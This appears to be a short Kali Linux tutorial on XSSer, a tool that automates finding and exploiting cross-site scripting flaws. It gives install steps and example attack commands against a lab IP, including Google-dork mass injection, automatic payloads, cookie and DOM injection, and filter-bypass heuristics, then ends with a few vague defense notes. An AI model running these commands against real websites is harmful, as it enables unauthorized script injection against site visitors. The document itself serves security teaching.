An attacker can insert untrusted JavaScript snippets without authorization into your program. The user who visits the target website then executes this JavaScript. Cross-site Scripter (aka XSSer) is an automated system for finding, leveraging and reporting web-based vulnerabilities in XSS. This provides several ways for trying to circumvent other filters and several different injection code techniques.
XSSer setup–XSS update
XSSer is operating on a number of platforms. Python and the following libraries are required: To install on Debian-based systems sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
Usage
To list all the features XSSer Package “xsser -h” root@kali:~# xsser -h To launch a simple Injection attack root@kali:~# xsser -u “http://192.168.169.130/xss/example1.php?name=hacker”
Injection from Dork, by selecting “google” as search engine:
root@kali:~# xsser –De “google” -d “search.php?q=” In this KaliLinux tutorial, a reverse link is formed to make multiple URL injections with automatic payload. xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –auto –reverse-check -s Simple URL Injection, using GET, injecting on Cookie and using DOM shadow xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” -g “/path?vuln=” –Coo –Dom –Fp=”vulnerablescript”
Parameter filtering with heuristics
root@kali:~# xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –heuristic
To Launch GUI Interface
root@kali:~# xsser –gtk
Core characteristics
Both GET and POST injections. Includes different filters and bypass techniques. The command line and GUI can be used respectively. Will give detailed details about the attack.
XSS Standard Defenses
Which feedback do we have faith in? Does it stick to the patterns expected? Do not represent untrustworthy results. Even applicable for data in our database. Context (Java / attribute / HTML / CSS) encoding.